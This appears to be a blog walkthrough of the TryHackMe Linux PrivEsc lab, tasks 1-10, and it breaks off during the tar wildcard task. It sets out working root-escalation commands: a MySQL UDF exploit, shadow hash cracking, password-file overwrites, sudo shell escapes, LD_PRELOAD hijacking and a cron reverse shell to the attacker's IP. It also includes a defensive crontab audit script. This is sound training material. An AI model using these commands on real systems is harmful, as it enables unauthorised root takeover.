{"id":131891,"date":"2023-02-16T18:46:16","date_gmt":"2023-02-16T18:46:16","guid":{"rendered":"https:\/\/blog.finxter.com\/?p=1138616"},"modified":"2023-02-16T18:46:16","modified_gmt":"2023-02-16T18:46:16","slug":"tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2","status":"publish","type":"post","link":"https:\/\/sickgaming.net\/blog\/2023\/02\/16\/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2\/","title":{"rendered":"TryHackMe Linux PrivEsc \u2013 Magical Linux Privilege Escalation (1\/2)"},"content":{"rendered":"\n<h2>CHALLENGE OVERVIEW<\/h2>\n<figure class=\"wp-block-embed-youtube wp-block-embed is-type-video is-provider-youtube\"><a href=\"https:\/\/blog.finxter.com\/tryhackme-linux-privesc-magical-linux-privilege-escalation-1-2\/\"><img decoding=\"async\" src=\"https:\/\/blog.finxter.com\/wp-content\/plugins\/wp-youtube-lyte\/lyteCache.php?origThumbUrl=https%3A%2F%2Fi.ytimg.com%2Fvi%2Fmtw2fk27bsY%2Fhqdefault.jpg\" alt=\"YouTube Video\"><\/a><figcaption><\/figcaption><\/figure>\n<ul>\n<li><strong>CTF Creator: <\/strong><a href=\"https:\/\/tryhackme.com\/p\/Tib3rius\"><strong>Tib3rius<\/strong><\/a><\/li>\n<li><strong>Link: <\/strong><a href=\"https:\/\/tryhackme.com\/room\/linuxprivesc\">https:\/\/tryhackme.com\/room\/linuxprivesc<\/a><\/li>\n<li><strong>Difficulty<\/strong>: medium<\/li>\n<li><strong>Target<\/strong>: gaining root 
access using a variety of different techniques<\/li>\n<li><strong>Highlight<\/strong>: Quickly gaining root access on a Linux computer in many different ways<\/li>\n<li><strong>Tags<\/strong>: <em>privesc, linux, privilege escalation<\/em><\/li>\n<\/ul>\n<h2>BACKGROUND<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"713\" height=\"472\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230.png\" alt=\"\" class=\"wp-image-1138655\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230.png 713w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-230-300x199.png 300w\" sizes=\"auto, (max-width: 713px) 100vw, 713px\" \/><\/figure>\n<\/div>\n<p>Using different exploits to compromise operating systems can feel like magic (when they work!).<\/p>\n<p>In this walkthrough, you will see various \u201cmagical\u201d ways that Linux systems can be rooted. None of them needs a software vulnerability: each relies on a misconfiguration of the kind that is common on real systems, such as password files that are readable or writable when they should not be, sudo rules that hand out a root shell, or cron jobs whose scripts or search path a normal user controls. 
In this post, we will cover tasks 1-10.<\/p>\n<h2>TASK 1 Deploy the Vulnerable Debian VM<\/h2>\n<p>After connecting to the TryHackMe VPN, start a <code>notes.txt<\/code> file and record the target and attacker IPs as shell variables, so that later commands can reuse them instead of retyping addresses:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">export targetIP=10.10.63.231\nexport myIP=10.6.2.23<\/pre>\n<p>Now log in via SSH using the starting credentials given in the room, and check who we are:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ssh user@10.10.63.231\nid\nuid=1000(user) gid=1000(user) groups=1000(user),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev)\n<\/pre>\n<p><code>id<\/code> shows an ordinary account with no group that grants privileges on its own (such as <code>docker<\/code> or <code>disk<\/code>), so every path to root below goes through a misconfiguration. Let\u2019s start exploiting this machine!<\/p>\n<h2>TASK 2 Service Exploits<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"534\" height=\"796\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231.png\" alt=\"\" class=\"wp-image-1138658\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231.png 534w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-231-201x300.png 201w\" sizes=\"auto, (max-width: 534px) 100vw, 534px\" \/><\/figure>\n<\/div>\n<p>In this task, we escalate through MySQL using the user-defined function (UDF) exploit from <a href=\"https:\/\/www.exploit-db.com\/exploits\/1518\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/www.exploit-db.com\/exploits\/1518<\/a> (raptor_udf2). The exploit compiles a shared object, loads it into MySQL with <code>CREATE FUNCTION ... SONAME<\/code>, and so gains a <code>do_system()<\/code> SQL function that runs shell commands with the privileges of the database server. It only yields root because two things are true here: <code>mysqld<\/code> itself runs as root (confirm with <code>ps<\/code> before bothering), and the MySQL root account can be used without a password.<\/p>\n<p>We\u2019ll use <code>do_system()<\/code> to copy <code>\/bin\/bash<\/code> to <code>\/tmp\/rootbash<\/code> and set its SUID bit, so that <code>\/tmp\/rootbash -p<\/code> spawns a root shell. 
The exploit source is already on the box (the shell prompts in later screenshots show it under <code>~\/tools\/mysql-udf<\/code>), so the privesc is a matter of compiling it, loading the resulting shared object into MySQL as a function, and calling that function; the exact commands are in the screenshot below. Once <code>\/tmp\/rootbash<\/code> exists, check with <code>ls -l<\/code> that it is owned by root with the SUID bit set before running it.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"393\" height=\"584\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217.png\" alt=\"\" class=\"wp-image-1138627\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217.png 393w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-217-202x300.png 202w\" sizes=\"auto, (max-width: 393px) 100vw, 393px\" \/><\/figure>\n<\/div>\n<h2>TASK 3 Weak File Permissions &#8211; Readable \/etc\/shadow<\/h2>\n<p><code>\/etc\/shadow<\/code> holds the password hashes and should be readable only by root. On this box it is world-readable, so we can copy root\u2019s hash out and crack it offline with <strong><em><a href=\"https:\/\/blog.finxter.com\/tryhackme-daily-bugle-made-easy-a-helpful-walkthrough-with-hacking-video\/\" data-type=\"post\" data-id=\"1106248\" target=\"_blank\" rel=\"noreferrer noopener\">John the Ripper<\/a><\/em><\/strong>.<\/p>\n<p>First, save root\u2019s entry from <code>\/etc\/shadow<\/code> (the whole line is fine; John parses it) into <code>hash.txt<\/code> on the attacking machine.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"593\" height=\"115\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218.png\" alt=\"\" class=\"wp-image-1138629\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218.png 593w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-218-300x58.png 300w\" sizes=\"auto, (max-width: 593px) 100vw, 593px\" \/><\/figure>\n<\/div>\n<p>Next, run John against it with <code>rockyou.txt<\/code> as the wordlist. The <code>$6$<\/code> prefix tells John this is sha512crypt; add <code>--format=sha512crypt<\/code> if it reports an ambiguous hash type.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" 
data-enlighter-title=\"\" data-enlighter-group=\"\">john --wordlist=&lt;\/PATH\/TO\/>rockyou.txt hash.txt<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"372\" height=\"473\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219.png\" alt=\"\" class=\"wp-image-1138631\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219.png 372w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-219-236x300.png 236w\" sizes=\"auto, (max-width: 372px) 100vw, 372px\" \/><\/figure>\n<\/div>\n<p>We have found our root password, <code>password123<\/code>! Confirm it with <code>su root<\/code> on the target rather than trusting the crack alone.<\/p>\n<h2>TASK 4 Weak File Permissions &#8211; Writable \/etc\/shadow<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"716\" height=\"469\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232.png\" alt=\"\" class=\"wp-image-1138659\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232.png 716w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-232-300x197.png 300w\" sizes=\"auto, (max-width: 716px) 100vw, 716px\" \/><\/figure>\n<\/div>\n<p>In this task <code>\/etc\/shadow<\/code> is also writable, so instead of cracking root\u2019s hash we replace it with one for a password we choose. Generate a SHA-512 crypt hash with <code>mkpasswd<\/code> (from the <code>whois<\/code> package; the placeholder <code>newpasswordhere<\/code> is the new password):<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">mkpasswd -m sha-512 newpasswordhere\n$6$pz5mE.wYesKIYGN$jyRHWFXauy1tWmXLWABRKFjUplUH4u7w2YvxEysk5OPcS.HcgBoQkYt66gkkuMB6EKK8WUh1CY.BAO2mdOdPb.\n<\/pre>\n<p>Then open <code>\/etc\/shadow<\/code> in an editor and replace only the second field of root\u2019s line (the text between the first and second colon) with the new hash, leaving the other fields intact; keep a copy of the original line so the box can be restored afterwards. Switching user with the new password proves it worked:<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"422\" height=\"588\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220.png\" alt=\"\" 
class=\"wp-image-1138638\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220.png 422w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-220-215x300.png 215w\" sizes=\"auto, (max-width: 422px) 100vw, 422px\" \/><\/figure>\n<\/div>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~\/tools\/mysql-udf$ nano \/etc\/shadow\nuser@debian:~\/tools\/mysql-udf$ su root\nPassword:\nroot@debian:\/home\/user\/tools\/mysql-udf#\n<\/pre>\n<h2>TASK 5 Weak File Permissions &#8211; Writable \/etc\/passwd<\/h2>\n<p><code>\/etc\/passwd<\/code> is world-readable by design, but here it is also writable. The second field of each entry normally holds an <code>x<\/code>, which tells the system to look the hash up in <code>\/etc\/shadow<\/code>; if a hash is placed there directly, it is used instead. So we generate a hash (any crypt-compatible format works, including the SHA-512 one from Task 4) and paste it over the <code>x<\/code> in root\u2019s line, then <code>su root<\/code> with the new password. An alternative that leaves the real root entry untouched is to append a new line with uid 0, our hash and a name of our choosing. First, generate the hash:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">openssl passwd newpasswordhere<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"409\" height=\"545\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221.png\" alt=\"\" class=\"wp-image-1138639\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221.png 409w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-221-225x300.png 225w\" sizes=\"auto, (max-width: 409px) 100vw, 409px\" \/><\/figure>\n<\/div>\n<h2>TASK 6 Sudo &#8211; Shell Escape Sequences<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"534\" height=\"796\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233.png\" alt=\"\" class=\"wp-image-1138660\" 
srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233.png 534w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-233-201x300.png 201w\" sizes=\"auto, (max-width: 534px) 100vw, 534px\" \/><\/figure>\n<\/div>\n<p>Let\u2019s check which commands sudo lets us run as root:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">sudo -l<\/pre>\n<p>Any of the listed binaries with a sudo entry on GTFOBins gives a root shell, except <code>apache2<\/code>, which has no shell-escape entry there (Task 7 abuses it through environment variables instead).<\/p>\n<p>Here we use <code>more<\/code>.<\/p>\n<p class=\"has-base-background-color has-background\">\ud83d\udc49 <strong>Link<\/strong>: <a href=\"https:\/\/gtfobins.github.io\/gtfobins\/more\/\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/gtfobins.github.io\/gtfobins\/more\/<\/a><\/p>\n<p>Running the following two commands gives us a root shell. <code>more<\/code> opens the file as root; the file has to be longer than one screen so that the pager actually pauses at its prompt, and at that prompt <code>!<\/code> runs a shell command, which therefore runs as root too:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">TERM= sudo more \/etc\/profile\n!\/bin\/sh\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"420\" height=\"595\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222.png\" alt=\"\" class=\"wp-image-1138643\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222.png 420w, 
https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-222-212x300.png 212w\" sizes=\"auto, (max-width: 420px) 100vw, 420px\" \/><\/figure>\n<\/div>\n<h2>TASK 7 Sudo &#8211; Environment Variables<\/h2>\n<p>sudo normally scrubs the environment, but the defaults shown by <code>sudo -l<\/code> on this box keep <code>LD_PRELOAD<\/code> and <code>LD_LIBRARY_PATH<\/code> (<code>env_keep<\/code>). Both variables steer the dynamic loader, so we can make any command we are allowed to sudo load code of our choosing before it does anything else.<\/p>\n<h3>Method 1: preload file spoofing<\/h3>\n<p><code>preload.c<\/code> (already on the box) defines an <code>_init()<\/code> that clears <code>LD_PRELOAD<\/code>, sets uid and gid to 0 and starts <code>bash -p<\/code>; building it with <code>-nostartfiles<\/code> lets that function run as the library\u2019s initializer. The host program hardly matters, so we use <code>more<\/code> again:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">gcc -fPIC -shared -nostartfiles -o \/tmp\/preload.so \/home\/user\/tools\/sudo\/preload.c\nsudo LD_PRELOAD=\/tmp\/preload.so more\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"530\" height=\"564\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223.png\" alt=\"\" class=\"wp-image-1138644\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223.png 530w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-223-282x300.png 282w\" sizes=\"auto, (max-width: 530px) 100vw, 530px\" \/><\/figure>\n<\/div>\n<h3>Method 2: shared object spoofing<\/h3>\n<p><code>ldd<\/code> lists the libraries <code>apache2<\/code> loads; <code>libcrypt.so.1<\/code> is one of them. We build a fake <code>libcrypt.so.1<\/code> from <code>library_path.c<\/code> (a constructor that clears <code>LD_LIBRARY_PATH<\/code>, becomes root and starts <code>bash -p<\/code>) and put <code>\/tmp<\/code> first in the library search path, so the loader picks ours before the real one. Remove <code>\/tmp\/libcrypt.so.1<\/code> afterwards; it is only found while <code>LD_LIBRARY_PATH<\/code> points at <code>\/tmp<\/code>, but there is no reason to leave it behind.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">ldd \/usr\/sbin\/apache2\ngcc -o \/tmp\/libcrypt.so.1 -shared -fPIC \/home\/user\/tools\/sudo\/library_path.c\nsudo LD_LIBRARY_PATH=\/tmp apache2\n<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"675\" height=\"247\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224.png\" alt=\"\" class=\"wp-image-1138645\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224.png 675w, 
https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-224-300x110.png 300w\" sizes=\"auto, (max-width: 675px) 100vw, 675px\" \/><\/figure>\n<\/div>\n<h2>TASK 8 Cron Jobs &#8211; File Permissions<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"711\" height=\"537\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234.png\" alt=\"\" class=\"wp-image-1138661\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234.png 711w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-234-300x227.png 300w\" sizes=\"auto, (max-width: 711px) 100vw, 711px\" \/><\/figure>\n<\/div>\n<p>In this task, we root the box through <code>overwrite.sh<\/code>, a script that <code>\/etc\/crontab<\/code> runs as root every minute.<\/p>\n<p>The script is world-writable (check with <code>ls -l<\/code> on the path given in the crontab), so we can replace its contents with a reverse shell and catch it on a listener. 
The cron entry runs as root, so the shell that comes back is a root shell.<\/p>\n<p>Overwrite the file with the following (10.6.2.23 is our VPN address from Task 1):<\/p>\n<pre class=\"wp-block-preformatted\"><code>#!\/bin\/bash\nbash -i >&amp; \/dev\/tcp\/10.6.2.23\/8888 0>&amp;1<\/code><\/pre>\n<p>Now start a <code>netcat<\/code> listener and wait at most a minute for the job to fire:<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">nc -lnvp 8888<\/pre>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"807\" height=\"497\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225.png\" alt=\"\" class=\"wp-image-1138647\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225.png 807w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225-300x185.png 300w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-225-768x473.png 768w\" sizes=\"auto, (max-width: 807px) 100vw, 807px\" \/><\/figure>\n<\/div>\n<h2>TASK 9 Cron Jobs &#8211; PATH Environment Variable<\/h2>\n<p>In this task, we hijack the crontab\u2019s <code>PATH<\/code>. The crontab sets a <code>PATH<\/code> that starts with <code>\/home\/user<\/code>, and the cron entry calls <code>overwrite.sh<\/code> by bare name, so cron\u2019s shell looks in our home directory first. Creating our own <code>overwrite.sh<\/code> there hijacks the job without touching the real script; it must be executable (<code>chmod +x<\/code>), or cron\u2019s shell cannot run it.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~$ cat overwrite.sh\n#!\/bin\/bash\ncp \/bin\/bash \/tmp\/rootbash\nchmod +xs \/tmp\/rootbash\n<\/pre>\n<p>This script copies <code>\/bin\/bash<\/code> to <code>\/tmp<\/code> and makes the copy executable with the SUID bit set (<code>chmod +xs<\/code>). 
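<\/p>
<p>As an added example that is not code from the original post or the TryHackMe room, the script below audits a system crontab for the two conditions Tasks 8 and 9 rely on: a root-run script that untrusted users can modify, and a cron <code>PATH<\/code> directory that untrusted users can write to and that is searched before the directory holding the real command. The crontab text, script names and sandbox directory are constructed for the demo in the shape of the room\u2019s <code>\/etc\/crontab<\/code>; on a real host you would call <code>audit_crontab \/etc\/crontab<\/code> with the defaults (no sandbox prefix, root as the trusted owner) and point it at the files under <code>\/etc\/cron.d<\/code> as well.<\/p>

```shell
#!/bin/sh
# Added example, not code from the original post or the TryHackMe room.
# Audits a system crontab (/etc/crontab format, which has a user field) for the
# two conditions Tasks 8 and 9 depend on and prints one finding per line:
#   WRITABLE_SCRIPT <path>       root-run script that untrusted users can edit (Task 8)
#   HIJACKABLE_PATH <cmd> <dir>  cron PATH directory that untrusted users can write to
#                                and that is searched before <cmd> is found (Task 9)
#   MISSING_CMD <cmd>            bare command found in no PATH directory at all
# The crontab text, script names and sandbox tree in run_demo are constructed.

# Returns 0 if $1 exists and someone other than uid $2 (default 0, root) can
# write it: group/other write bit set, or owned by a different uid. Symlinks
# and the parent directories of $1 are deliberately out of scope.
writable_by_untrusted() {
    _path=$1 _trusted=${2:-0}
    [ -e "$_path" ] || return 1
    _mode=$(stat -c '%a' "$_path") || return 1
    _owner=$(stat -c '%u' "$_path") || return 1
    # the leading 0 makes the shell parse the mode as octal; 022 = g+w | o+w
    if [ $((0$_mode & 022)) -ne 0 ] || [ "$_owner" != "$_trusted" ]; then
        return 0
    fi
    return 1
}

# Prints findings for crontab $1. $2 is a prefix put in front of every path
# ("" on the live system, a sandbox root in the demo); $3 is the uid whose
# files are trusted (default 0).
audit_crontab() {
    _crontab=$1 _root=${2:-} _trusted_uid=${3:-0}
    _cron_path=/usr/bin:/bin      # cron's default when the crontab sets no PATH
    set -f                        # keep the '*' schedule fields from globbing
    while IFS= read -r _line || [ -n "$_line" ]; do
        set -- $_line
        case ${1:-} in
            ''|'#'*) continue ;;
            PATH=*)
                _cron_path=${1#PATH=}
                _cron_path=${_cron_path#\"}; _cron_path=${_cron_path%\"}
                continue ;;
            *=*) continue ;;      # other NAME=value lines (SHELL=, MAILTO=)
            @*)  _cmd=${3:-} ;;   # @reboot / @daily   user  command
            *)   _cmd=${7:-} ;;   # min hour dom mon dow   user  command
        esac
        [ -n "$_cmd" ] || continue
        case $_cmd in
            */*)                  # explicit path: only the file itself matters
                if writable_by_untrusted "$_root$_cmd" "$_trusted_uid"; then
                    printf 'WRITABLE_SCRIPT %s\n' "$_cmd"
                fi ;;
            *)                    # bare name: walk the cron PATH like cron's sh would
                _found=
                _saved_ifs=$IFS; IFS=:
                set -- $_cron_path
                IFS=$_saved_ifs
                for _dir; do
                    if [ -f "$_root$_dir/$_cmd" ]; then
                        _found=1
                        if writable_by_untrusted "$_root$_dir/$_cmd" "$_trusted_uid"; then
                            printf 'WRITABLE_SCRIPT %s\n' "$_dir/$_cmd"
                        fi
                        break
                    fi
                    if writable_by_untrusted "$_root$_dir" "$_trusted_uid"; then
                        printf 'HIJACKABLE_PATH %s %s\n' "$_cmd" "$_dir"
                    fi
                done
                [ -n "$_found" ] || printf 'MISSING_CMD %s\n' "$_cmd" ;;
        esac
    done < "$_crontab"
    set +f
    return 0
}

# Builds a sandbox shaped like the room's file system and audits a constructed
# crontab in it. The demo's own uid is passed as the trusted owner so that only
# the mode bits decide the outcome, whoever runs it.
run_demo() {
    _sb=$(mktemp -d)
    mkdir -p "$_sb/home/user" "$_sb/usr/local/bin" "$_sb/opt/backup"
    printf '#!/bin/bash\necho "backup done"\n' > "$_sb/usr/local/bin/overwrite.sh"
    cp "$_sb/usr/local/bin/overwrite.sh" "$_sb/usr/local/bin/compress.sh"
    cp "$_sb/usr/local/bin/overwrite.sh" "$_sb/opt/backup/rotate.sh"
    chmod 777 "$_sb/usr/local/bin/overwrite.sh"   # Task 8: world-writable, run by root
    chmod 755 "$_sb/usr/local/bin/compress.sh"    # locked down: no finding
    chmod 775 "$_sb/opt/backup/rotate.sh"         # group-writable: still a finding
    chmod 777 "$_sb/home/user"   # models "owned by user"; on a real host the uid check catches that
    cat > "$_sb/crontab" <<'EOF'
# constructed /etc/crontab, same shape as the room's
PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
* * * * * root overwrite.sh
* * * * * root /usr/local/bin/compress.sh
*/5 * * * * root /opt/backup/rotate.sh
@daily root /opt/backup/rotate.sh --full
EOF
    audit_crontab "$_sb/crontab" "$_sb" "$(id -u)"
    rm -rf "$_sb"
}

run_demo
```

<p>Running it prints one <code>HIJACKABLE_PATH<\/code> line for <code>overwrite.sh<\/code> via <code>\/home\/user<\/code> and three <code>WRITABLE_SCRIPT<\/code> lines (the world-writable <code>overwrite.sh<\/code> and the group-writable <code>rotate.sh<\/code>, which two jobs call); the properly locked-down <code>compress.sh<\/code> is not reported. The audit judges writability from mode bits and ownership only; it does not follow symlinks or inspect the parent directories of an absolute script path, both of which belong in a thorough review.<\/p>
<p>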
Once cron has run it (within a minute; <code>ls -l \/tmp\/rootbash<\/code> should show a root-owned file with the <code>s<\/code> bit), we get a root shell by running the copy with <code>-p<\/code>, which tells bash to keep the effective uid instead of dropping it back to ours.<\/p>\n<pre class=\"EnlighterJSRAW\" data-enlighter-language=\"generic\" data-enlighter-theme=\"\" data-enlighter-highlight=\"\" data-enlighter-linenumbers=\"\" data-enlighter-lineoffset=\"\" data-enlighter-title=\"\" data-enlighter-group=\"\">user@debian:~$ \/tmp\/rootbash -p\nrootbash-4.1# id\nuid=1000(user) gid=1000(user) euid=0(root) egid=0(root) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user)\nrootbash-4.1# exit\n<\/pre>\n<p>Note <code>euid=0(root)<\/code> next to <code>uid=1000(user)<\/code>: the SUID bit raised the effective uid, and <code>-p<\/code> kept it.<\/p>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"800\" height=\"895\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226.png\" alt=\"\" class=\"wp-image-1138648\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226.png 800w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226-268x300.png 268w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-226-768x859.png 768w\" sizes=\"auto, (max-width: 800px) 100vw, 800px\" \/><\/figure>\n<\/div>\n<h2>TASK 10 Cron Jobs &#8211; Wildcards<\/h2>\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-full\"><img decoding=\"async\" loading=\"lazy\" width=\"708\" height=\"468\" src=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235.png\" alt=\"\" class=\"wp-image-1138662\" srcset=\"https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235.png 708w, https:\/\/blog.finxter.com\/wp-content\/uploads\/2023\/02\/image-235-300x198.png 300w\" sizes=\"auto, (max-width: 708px) 100vw, 708px\" \/><\/figure>\n<\/div>\n<p>In this task the cron job\u2019s backup script runs <code>tar<\/code> over the contents of <code>\/home\/user<\/code> with a shell wildcard (<code>*<\/code>). The shell expands the wildcard into file names before <code>tar<\/code> sees them, and GNU <code>tar<\/code> accepts options anywhere on its command line, so a file whose name looks like an option is parsed as one. Its <code>--checkpoint-action=exec=<\/code> option makes <code>tar<\/code> run a command; we point it at a reverse-shell ELF, and because the job runs as root that gives us a root shell on our 
